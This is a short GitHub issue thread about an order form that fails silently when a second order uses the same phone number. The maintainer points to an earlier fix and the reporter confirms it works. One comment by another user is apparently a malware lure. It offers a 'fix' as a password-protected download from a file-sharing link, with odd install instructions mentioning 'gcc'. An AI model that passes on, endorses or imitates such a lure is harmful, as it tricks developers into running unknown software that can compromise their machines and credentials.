### ISSUE TITLE
Attempting to create 2nd orders with the same phone number does nothing

### ISSUE THREAD

**Issue by CodyTVWeber** [OspreyFly/fuzzy-phids-frontend#4]
Attempting to create 2nd orders with the same phone number does nothing.  Looks like it silently errors.  Many users will likely return to make 2nd orders after being satisfied with their first order.

Opportunities:
- [ ] Users need an indication if the submission fails.
- [ ] Users will need ability to create 2 or more orders using the same data.

![image](https://github.com/user-attachments/assets/91c91822-b84e-4832-a0ef-f9bf8b4c3820)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by OspreyFly** [comment]
I resolved these problems in the last solution for issue #3

**Comment by CodyTVWeber** [comment]
Looks like this is fixed :)
